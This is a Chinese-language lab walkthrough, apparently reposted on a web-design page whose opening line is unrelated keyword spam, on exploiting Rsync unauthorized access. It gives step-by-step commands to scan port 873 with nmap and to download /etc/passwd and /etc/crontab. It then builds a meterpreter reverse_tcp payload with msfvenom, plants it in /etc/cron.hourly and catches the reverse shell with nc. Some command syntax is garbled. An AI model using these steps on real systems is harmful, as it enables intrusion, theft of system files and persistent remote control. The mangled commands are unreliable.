昆明专业的网站制作建设,摘抄一则新闻,好看的官网源码,网站开发数据库课程设计一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞
nmap -p 873 --script rsync-list-modules 加IP地址
查看到是有漏洞的模块的 二、使用rsync命令连接并读取文件 查看src目录里面的信息。 三、对系统中的敏感文件进行下载——/etc/passwd
执行命令#xff1a;
rsy…一、使用nmap模块查看该ip地址有没有Rsync未授权访问漏洞
nmap -p 873 --script rsync-list-modules 加IP地址
查看到是有漏洞的模块的 二、使用rsync命令连接并读取文件 查看src目录里面的信息。 三、对系统中的敏感文件进行下载——/etc/passwd
执行命令
rsync rsync://43.136.68.40:873/src/etc/passwd /home/kali/Desktop/ 查看下载下的文件
cat /home/kali/Desktop/passwd 也可在桌面双击打开 四、在本机使用命令创建一个phpinfo文件
随便往里面写一个文件测试一下例如phpinfo.php,如下命令在kali创建一个文件。 echo phpinfo.php
将文件再上传到受害者也就是靶场环境里。
rsync ./phpinfo.php rsync://43.136.68.40:873/src/home/
查看一下有没有写进去
rsync rsync://43.136.68.40:873/src/home/
成功写进去了文件。 五、反弹shell
查看定时任务
rsync://43.136.68.40:873/src/etc/crontab
将文件下载下到kali
rsync rsync://43.136.68.40:873/src/etc/crontab /home/kali/Desktop
查看一下文件里面的内容里面的大概意思就是每17分钟调用一次/etc/cron.hourly 在kali机子上拉取一个shell文件
语法msfvenom -p linux/x86/meterpreter/reverse_tcp lhost自己攻击机的地址 lport4444 --f elf -o shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost172.168.189.150 lport4444 --f elf -o shell 将shell文件提权
chmod 777 shell
六将shell上传到目标靶机中
命令语句
rsync -av /home/kali/Desktop/shell rsync://43.136.68.40:873/src/etc/cron.hourly 七、开启kali监听端口
nc -lvvp 4444
等待17分钟后查看监听到的信息代表连接成功。